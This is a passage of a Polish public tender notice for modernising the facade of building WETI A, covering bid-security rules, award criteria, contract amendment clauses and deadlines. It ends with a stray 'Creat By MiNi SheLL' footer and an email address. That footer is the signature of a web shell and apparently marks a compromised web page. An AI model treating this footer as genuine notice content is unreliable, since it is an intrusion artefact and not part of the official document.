3.	Wadium może być wnoszone w jednej lub w kilku następujących formach, o których mowa w art. 45 ust. 6 Pzp:

a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

4.	Z treści gwarancji i poręczeń, o których mowa w art. 45 ust. 6 pkt 2-5 Pzp musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie zamawiającego, zobowiązanie gwaranta do zapłaty na rzecz zamawiającego kwoty określonej w gwarancji:

4.1. jeżeli wykonawca, którego oferta została wybrana:

                 - odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach   
                           określonych w ofercie,
                   -  nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
                   -  zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe 
                                 z przyczyn leżących po stronie wykonawcy.

4.2.	jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie, nie złoży oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 Pzp, pełnomocnictw lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co spowoduje brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej

5.	Wadium wnosi się przed upływem terminu składania ofert. Wadium wnoszone w pieniądzu wpłaca        się        przelewem        na        rachunek        bankowy        zamawiającego 64 1160 2202 0000 0001 8607 3782  Kopię  polecenia  przelewu  lub  wydruk  z  przelewu elektronicznego zaleca się złożyć wraz z ofertą.

6.	Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez zamawiającego nastąpi przed upływem terminu składania ofert).

7.	Oryginał dokumentu potwierdzającego wniesienie wadium w formach, o których mowa w art. 45 ust. 6 pkt 2-5 Pzp wykonawca składa wraz z ofertą.

8.	Jeżeli wadium zostanie wniesione w walucie obcej, kwota wadium zostanie przeliczona na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.

9.	Jeżeli wadium zostanie wniesione w formach, o których mowa w art. 45 ust. 6 pkt 2 - 5 Pzp i kwota wadium zostanie w tych  formach  określona w walucie obcej,  kwota wadium zostanie przeliczona na PLN wg średniego kursu  PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych.

10.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, o których mowa w art. 45 ust. 6 pkt 2 - 5 Pzp, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego na Modernizację elewacji budynku WETI A oznaczenie sprawy:  CRZP/303/009/R/16.

11.	Za zgodą zamawiającego wykonawca może dokonać zmiany formy wadium na jedną lub kilka form, o których mowa w art. 148 ust. 1 Pzp. Zmiana formy wadium musi być dokonana z zachowaniem ciągłości zabezpieczenia oferty kwotą wadium.

12.	W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizaji</td><td>20</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />16.	Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru wykonawcy, dotyczących:
a)	terminu
            Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w 
            przypadku wystąpienia jednej z niżej wymienionej okoliczności pod warunkiem, że ma ona 
            wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować 
            zmianę terminu mogą wynikać z:
- przestojów i opóźnień zawinionych przez Zamawiającego,
    - działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne zdarzenia losowe), 
      nieprzewidziane i niemożliwe do przewidzenia
    - wstrzymania robót przez Zamawiającego
    - konieczności oczekiwania na wprowadzenie przez projektanta korekt i uściśleń 
      w rozwiązaniach projektowych,
    - ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody 
      w budynku,
    - ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód 
      prawnych, formalnych lub technologicznych, w szczególności potrzeba uzyskania
      dodatkowych niemożliwych do przewidzenia na etapie planowania decyzji lub pozwoleń osób 
      trzecich lub właściwych organów
    - realizacji robót dodatkowych, zamiennych lub zaniechania części robót,
            - niekorzystnych warunków atmosferycznych uniemożliwiających bądź w poważnym stopniu 
              utrudniających realizację robót, co każdorazowo potwierdzi kierownik budowy w oparciu 
              o złożony przez Wykonawcę dokument IMiGW o stanie pogody. Za niekorzystne warunki
              pogodowe utrudniające realizację robót zewnętrznych Strony uznają temperaturę poniżej  
              +5°C przez okres min. 3 dni roboczych, opady deszczu ciągłe - powyżej 2 dni roboczych.

      W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym że wielkość 
      zmian musi być powiązana z przyczyną jaka ją spowodowała.
      Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia  
      terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości 
      zabezpieczenia i jego wymaganej wysokości. 
b)	zakresu i wartości umowy
            Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub 
            zaniechane. 
            Wprowadzenie robót zamiennych jest możliwe jeśli:
1)	jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne 
skutki w trakcie eksploatacji przedmiotu umowy, 
2)	stało się konieczne na skutek ujawnienia się błędów w dokumentacji projektowej, lub 
przeszkód w budynku, 
3)	pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych   
w  dokumentacji projektowej,
4)	dotyczą zastosowania nowych technologii nieznanych zamawiającemu i niedostępnych     
               w momencie zawarcia umowy,
5)	zleconych robót dodatkowych
       Realizacja robót zamiennych w stosunku do określonych w umowie, musi być wywołana 
       czynnikami obiektywnymi związanymi z tą realizacją tj. niezależnymi od wykonawcy, związanymi 
       z koniecznością wprowadzenia zmian warunkujących realizację prac zgodnie ze sztuką 
       budowlaną, nie powodującymi rozszerzenia przedmiotu zamówienia określonego w dokumentacji 
       projektowej ani wynagrodzenia wykonawcy. 
       Wprowadzenie robót zaniechanych jest możliwe jeśli:
           1)   są one następstwem zleconych robót dodatkowych
           2)   konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania      
                 przedmiotu umowy
           3)   zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży     
                 w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia 
                 umowy. 
         Wartość robót zaniechanych zostanie ustalona na podstawie cen z kosztorysu ofertowego
         Wykonawcy.
       c) zmiany w zakresie wysokości wynagrodzenia Wykonawcy
                   1) Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego 
                      Wykonawcy, o którym mowa w § 4 ust. 1 Umowy, w formie pisemnego aneksu, 
                      każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:
                      - zmiany stawki podatku od towarów i usług,
                      - zmiany wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów 
                        o minimalnym wynagrodzeniu za pracę,
                      - zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu 
                        zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
                     na zasadach i w sposób określony w ppkt. 2-12 opisanych  poniżej, jeżeli zmiany te 
                     będą miały wpływ na koszty wykonania Umowy przez Wykonawcę.
2) zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia  
    przesłanki, o której mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 1 będzie odnosić się 
    wyłącznie do części przedmiotu zrealizowanej , zgodnie z terminami ustalonymi 
    Umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów
    i usług oraz  wyłącznie do części przedmiotu Umowy, do której zastosowanie znajduje 
    zmiana stawki podatku od towarów i usług,
3) w przypadku zmiany, o której mowa w § 14 ust. 16 lit. c ppkt. 1, wartość    
    wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona     
    na podstawie nowych przepisów.
4) zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w 
                     § 14 ust. 16 lit. c ppkt. 1 tiret 2 i 3 będzie obejmować wyłącznie część wynagrodzenia 
                     należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów 
                     wykonania Umowy przez Wykonawcę w związku z wejściem w życie przepisów 
                     odpowiednio zmieniających wysokość minimalnego wynagrodzenia za pracę lub
                     dokonujących zmian w zakresie zasad podlegania ubezpieczeniom społecznym lub 
                     ubezpieczeniu zdrowotnemu lub w zakresie wysokości składki na ubezpieczenie 
                     społeczne lub zdrowotne,
                 5) W przypadku zmiany, o której mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 2, wynagrodzenie  
                     wykonawcy ulegnie zmianie o kwotę odpowiadająca wzrostowi kosztu Wykonawcy 
                     w związku ze zwiększeniem wysokości wynagrodzeń Pracowników świadczących roboty 
                     budowlane do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za 
                     pracę, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu 
                     minimalnego wynagrodzenia. Kwota odpowiadająca wzrostowi kosztu Wykonawcy 
                     będzie odnosić się wyłącznie do części wynagrodzenia Pracowników świadczących 
                     Roboty budowlane, o których mowa w zdaniu poprzedzającym, odpowiadającej 
                     zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu 
                     umowy,
      6) w przypadku zmiany, o której mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 3, wynagrodzenie 
          Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy 
          ponoszonego w związku z wypłatą wynagrodzenia Pracownikom świadczącym Roboty 
          budowlane. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się 
          wyłącznie do części wynagrodzenia pracowników świadczących Roboty budowlane,
          o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim 
          wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy,
      7) w celu zawarcia aneksu, o którym mowa w § 14 ust. 16 lit. c ppkt. 1, każda ze Stron   
          może wystąpić do drugiej Strony z wnioskiem o dokonanie zmiany wysokości 
          wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniem zawierającym w 
          szczególności wyliczenie całkowitej kwoty, o jaką wynagrodzenie Wykonawcy powinno 
          ulec zmianie oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmiana wysokości 
          kosztów wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia należnego 
          Wykonawcy,
      8) w przypadku zmian o których mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 2 i 3, jeżeli z 
          wnioskiem występuje Wykonawca, jest on zobowiązany dołączyć do wniosku  
          dokumenty, z których będzie wynikać, w jakim zakresie zmiany te mają wpływ na 
          koszty wykonania Umowy, w szczególności:
           pisemne zestawienie wynagrodzeń (przed i po zmianie) Pracowników świadczących 
             Roboty budowlane, wraz z określeniem zakresu (części etatu), w jakim wykonują oni 
             prace bezpośrednio związane z realizacją przedmiotu Umowy oraz części 
             wynagrodzenia odpowiadającej temu zakresowi  w przypadku zmiany, o której 
             mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 2,
           - pisemne zestawienie wynagrodzeń (przed i po zmianie) Pracowników świadczących  
             Roboty budowlane, wraz z kwotami składek uiszczanych do Zakładu Ubezpieczeń 
             Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego w części finansowanej 
             przez Wykonawcę, z określeniem zakresu (części etatu), w jakim wykonują oni prace 
             bezpośrednio związane z realizacją przedmiotu Umowy oraz części wynagrodzenia 
             odpowiadającej temu zakresowi  w przypadku zmiany, o której mowa w § 14 ust. 
             16 lit. c ppkt. 1 tiret 3,
         9) w przypadku zmiany, o której mowa w § 14 ust. 16 lit. c ppkt. 1 tiret 3, jeżeli   
             występuje Zamawiający jest on uprawniony do zobowiązania Wykonawcy do 
             przedstawienia w wyznaczonym terminie, nie krótszym niż 10 dni roboczych, 
             dokumentów, z których będzie wynikać w jakim zakresie zmiana ta ma wpływ na 
             koszty wykonania Umowy, w tym pisemnego zestawienia wynagrodzeń, o których 
             mowa w § 14 ust. 16 lit. c ppkt. 8 tiret 2,
       10) w terminie 10 dni roboczych od dnia przekazania wniosku, o którym mowa w § 14 
             ust. 16 lit. c ppkt. 7, Strona która otrzymała wniosek, przekażą drugiej Stronie 
             informację o zakresie, w jakim zatwierdza wniosek oraz wskaże kwotę, o którą 
             wynagrodzenie należne Wykonawcy powinno ulec zmianie, albo informację o 
             niezatwierdzeniu wniosku wraz z uzasadnieniem,
       11) w przypadku otrzymania przez Stronę informacji o niezatwierdzeniu wniosku lub 
            częściowym zatwierdzeniu wniosku, Strona ta może ponownie wystąpić z wnioskiem,  
            o którym mowa w § 14 ust. 16 lit. c ppkt. 7. W takim przypadku przepisy § 14 ust. 16 
            lit. c ppkt. 8-10 oraz 12 stosuje się odpowiednio.
       12) zawarcie aneksu nastapi nie później niż w termnie 10 dni roboczych od dnia  
             zatwierdzenia wniosku o dokonanie zmiany wysokości wynagrodzenia należnego 
             Wykonawcy.
     d) zmiany w składzie osób uczestniczących w wykonywaniu zamówienia 
                    1) Wykonawca może dokonywać zmiany osób, które będą uczestniczyć w wykonywaniu 
                        zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą 
                        Zamawiającego, akceptującą  nową osobę.  
                    2) w przypadku zmiany osoba, która będzie uczestniczyć w wykonywaniu zamówienia, 
       musi posiadać  kwalifikacje i doświadczenie, jakie posiadają osoby wskazane 
       w ofercie, spełniać wymagania określone w siwz oraz postanowieniach umowy,
   3) Wykonawca musi z własnej inicjatywy zaproponować zastępstwo w przypadku 
       śmierci, choroby  lub wypadku lub innej przyczyny wyłączającej możliwość pracy 
       któregokolwiek z osób. 
                    4) Zamawiający może żądać zmiany, jeżeli w jego opinii osoba ta jest nieefektywna lub 
                        nie wywiązuje się z obowiązków wynikających z Umowy.
        Zmiana Pracownika świadczącego Roboty budowlane dokonana zgodnie z zapisami § 14 ust. 16 
        lit. d ppkt. 1 nie wymaga zawierania przez Strony aneksu do umowy.


       e)     zmiany lub rezygnacji z Podwykonawcy
                    1) Wykonawca może dokonać zmiany lub zrezygnować z Podwykonawcy, na którego 
                        zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1, w
                        celu wykazania spełniania warunków udziału w postępowaniu, o których mowa 
                        w art. 22 ust. 1, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż 
                        proponowany inny Podwykonawca (lub Wykonawca samodzielnie) spełnia dany 
                        warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie 
                        postępowania o udzielenie zamówienia,
          2) powierzenie wykonania części zamówienia podwykonawcom nie zwalnia wykonawcy 
              z odpowiedzialności za należyte wykonanie tego zamówienia. 
          3) Zasady wprowadzenia podwykonawcy szczegółowo zostały określone w § 7 wzoru 
              umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com